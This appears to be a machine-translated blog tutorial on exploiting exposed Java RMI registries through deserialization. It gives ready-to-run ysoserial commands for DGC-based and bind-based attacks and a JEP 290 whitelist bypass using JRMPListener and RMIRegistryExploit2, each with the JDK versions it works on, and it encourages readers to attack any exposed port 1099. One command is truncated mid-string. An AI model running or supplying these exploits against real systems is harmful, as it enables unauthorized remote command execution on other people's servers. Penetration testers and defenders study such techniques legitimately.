current position:Home>Java RMI register deserialization attack

Java RMI register deserialization attack

2022-01-27 00:41:50 Shanfenglan7

1. Preface

What was attacked was rmi register Server side , Generally in 1099 port . If you meet an exposed 1099 Port can try to attack .

2. utilize

Don't worry about reporting mistakes , The command will execute normally
Don't worry about reporting mistakes , The command will execute normally

2.1 Client attack registry

This is a way for clients to attack the service center , The principle is RMI Frame adoption DGC(Distributed Garbage Collection) Distributed garbage collection mechanism to manage the life cycle of remote objects , It can be done through DGC Send malicious messages by means of communication payload Let the registry deserialize .

Conditions jdk<=jdk8u111

java -cp ysoserial.jar ysoserial.exploit.JRMPClient 1099 CommonsCollections6 "touch 

2.2 The server attacks the registry

The server needs to bind the class it wants to register to the registry , You can send deserialized data directly to the registry , This can lead to a deserialization vulnerability .

# Use bind The way to bind malicious payload The attack , Deserialized direct execution chain command .
Conditions jdk<=jdk8u111

java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit your-ip 1099 CommonsCollections6 "touch /tmp/123"  

2.3 Bypass the white list limit

This restriction is also called jep290,JDK Respectively RMI Registry and RMI The distributed garbage collector provides corresponding built-in filters . Both filters are configured as white lists , That is, only certain classes are allowed to be deserialized .

jdk8u232_b09 Version has whitelist restrictions on deserialized classes :

 Insert picture description here

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 12345 CommonsCollections6 "touch /tmp/123"
java -cp ysoserial.jar ysoserial.exploit.RMIRegistryExploit2 1099 12345

Conditions jdk<=jdk8u232_b09

 Insert picture description here

 Insert picture description here

Special version required ysoserial, Refer to the following article for details :

Reference article

copyright notice
author[Shanfenglan7],Please bring the original link to reprint, thank you.

Random recommended